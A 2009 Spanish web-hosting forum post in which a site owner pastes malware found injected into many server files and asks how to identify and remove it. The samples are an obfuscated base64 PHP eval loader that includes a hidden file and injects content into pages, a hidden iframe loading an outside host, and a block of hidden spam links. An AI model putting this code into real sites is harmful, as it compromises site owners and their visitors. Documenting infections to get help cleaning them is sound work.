Ver Mensaje Individual
  #27 (permalink)  
Antiguo 30/10/2009, 04:52
Avatar de el_javi
el_javi
 
Fecha de Ingreso: marzo-2005
Ubicación: MAdrid
Mensajes: 844
Antigüedad: 19 años, 8 meses
Puntos: 10
Respuesta: Virus en Servidor de Hosting

Hola a todos.

Tras solicitar y contratar servicios a un Administrador de Sistemas, hacer modificaciones en el servidor, instalar SuPHP, cambiar de FTP a SFTP y demás, todo se quedo "aparentemente bien"

No hemos tenido más apariciones de elementos extraños, Google no nos ha vuelto a bloquear nuestras páginas y ya no saltaban mis antivirus ni AntiSpywares. Todo estaba bien.

Pero ayer, otro programador y yo, encontramos en el servidor algo raro:

En muchos ficheros aparece esto:
Código:
<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvdmFyL3d3dy92aG9zdHMvdHVpbWFnZW5wZXJzb25hbC5jb20vaHR0cGRvY3MvYmxvZ2FzdW4vd3AtaW5jbHVkZXMvanMvdGlueW1jZS90aGVtZXMvYWR2YW5jZWQvaW1hZ2VzL3hwL19ub3Rlcy9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL3Zhci93d3cvdmhvc3RzL3R1aW1hZ2VucGVyc29uYWwuY29tL2h0dHBkb2NzL2Jsb2dhc3VuL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvdGhlbWVzL2FkdmFuY2VkL2ltYWdlcy94cC9fbm90ZXMvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgpeyRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkI9b3JkKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDMsMSkpOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9MTA7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0wO2lmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImNCl7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT11bnBhY2soJ3YnLHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDEwLDIpKTskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPSRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzFbMV07JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9MiskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjgpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMTYpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9Mjt9JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz1nemluZmxhdGUoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkpO2lmKCRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9PT1GQUxTRSl7JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz0kUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4O31yZXR1cm4gJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mzt9fWZ1bmN0aW9uIGRnb2JoKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0Ype0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA9Z3pkZWNvZGUoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCkpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApO31lbHNle3JldHVybiBnbWwoKS4kUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>
Esto es lo primero que encontramos, y lo encontramos en muchísimos ficheros.

Después, en muchos ficheros también, encontramos OTRA variante de estos códigos maliciosos, que os pego a continuación:

Código:
<iframe frameborder="0" onload="if (!this.src){ this.src='http://repox.servepics.com:8080/index.php'; this.height='0'; this.width='0';}" >Hdg8vlnpjx8e</iframe>"
Y ya finalmente, tras haber revisado todo el código fuente de un fichero (ocurre en muchos ficheros, pero nos hemos centrado en uno solo) tras revisar el código, quitar el EVAL, tras quitar el IFRAME (y sin quitar estos dos elementos) al ver el fichero ONLINE, nos encontramos esto después del BODY:

Código:
<style>#x_z {display:none;}</style><font id="x_z"> <li><a href="http://164.113.40.42/moodle17/calendar/set.php/?tjwo=6">benjamin maisani</a><li><a href="http://www.protego-org.org/index.php/?tuwt=7">droid vs iphone</a><li><a href="http://your-learning.org/portal/index.php/?trot=5">pumpkin carving templates free</a><li><a href="http://www.mariorotta.com/shopping/?tpfg=0">ani ashekian</a><li><a href="http://www.sciform-aulamagna2.unito.it/learning/mod/wiki/view.php/?trix=6">christa davies</a><li><a href="http://www.sciform-aulamagna2.unito.it/learning/mod/wiki/view.php/?trix=7">oprah.com payless</a><li><a href="http://webbiz.tuitionvalley.com/catalog.php/?tpfz=6">world series game 2 score</a><li> </font>
(lo he ocrtado porque era muy largo y no quería llenar un POST entero con esto)

Entonces... esto ¿que carajos es?

¿Todo esto? ¿DE donde sale? ¿cómo erradicarlo?

Estamos buscando también un Administrador de Sistemas que pueda darnos un presupuesto y nos ayude a solucionar esto y que no nos vuelva a pasar (la anteriro persona, hizo cambios, todo iba bien pero luego ha vuelto a aparecer estas cosas nuevas, por lo que queremos fiabilidad...)

Espero vuestros comentarios.

Un saludo.

Javier